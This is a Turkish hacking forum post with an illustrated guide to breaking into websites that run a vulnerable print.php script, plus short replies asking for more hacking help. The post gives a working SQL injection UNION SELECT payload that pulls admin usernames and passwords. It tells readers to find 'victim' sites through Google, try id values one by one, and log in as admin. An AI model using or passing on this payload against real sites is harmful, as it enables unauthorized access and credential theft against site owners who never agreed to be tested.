web hack resimli anlatım

Köstebek-02

Yaşayan Forum Efsanesi
Evet arkadasLar cok basit bi yontem bu hic bilmeyen biri bile bu versiyondaki siteye admin girişi yapabilir.

Öncelikle:
HTML Kod:
/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Bu kodu ezberlemeniz lazım...

Olay söle
www.orneksite.com/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Yukarda gordugunuz gibi. Yalnız ;

www.orneksite.com/print.php?what=article&id=X buranın sonunda olan X yerine 2 3 4 5 6 7 8 9 .. yazmanız gerekicek teker teker deniceksiniz. Yani söle örnek verim..

www.orneksite.com/print.php?what=article&id=2 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Bunun gibi. Şimdi resimlere baqarak daha iyi anlicaksınız...

wol_error.gif
This image has been resized. Click this bar to view the full image. The original image is sized 640x260.
adm10sa.jpg

Googleda arattırarak kurban siteyi buLun..

wol_error.gif
This image has been resized. Click this bar to view the full image. The original image is sized 640x220.
adm29mp.jpg

Resimdede gordugunuz gibi siteyi bulduktan sonra kodu alıp sitenin sonuna eklioruz ve X yerine 2 yazıoruz...

wol_error.gif
This image has been resized. Click this bar to view the full image. The original image is sized 640x220.
adm38py.jpg

Evet simdi admin ve şifresini buLmus olduk. Şimdi giriş yapıcaz...

wol_error.gif
This image has been resized. Click this bar to view the full image. The original image is sized 640x331.
adm49xb.jpg

Evet resimdede gordugunuz gibi bu iş bu kadar kolay beyler
allaha emanet olun babacanlar
rep verende vermeyende sağolsunnn

eyw ama çince bilmiyom google ye onu yazdın mı saçma sapan yazılar geliyor

bu hangi dille yazıyor kardeş ?? ellerine saqğlık, paylaşım için teşekkürler

olmadı şe yaramıyor bana www.???.com /net gibi adres leri haclemek istiyorum

bana ogretirmisiniz nasıl düzgün bir şekilde hack licem CXP-Fwd bana ögretirmisin

Geri

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.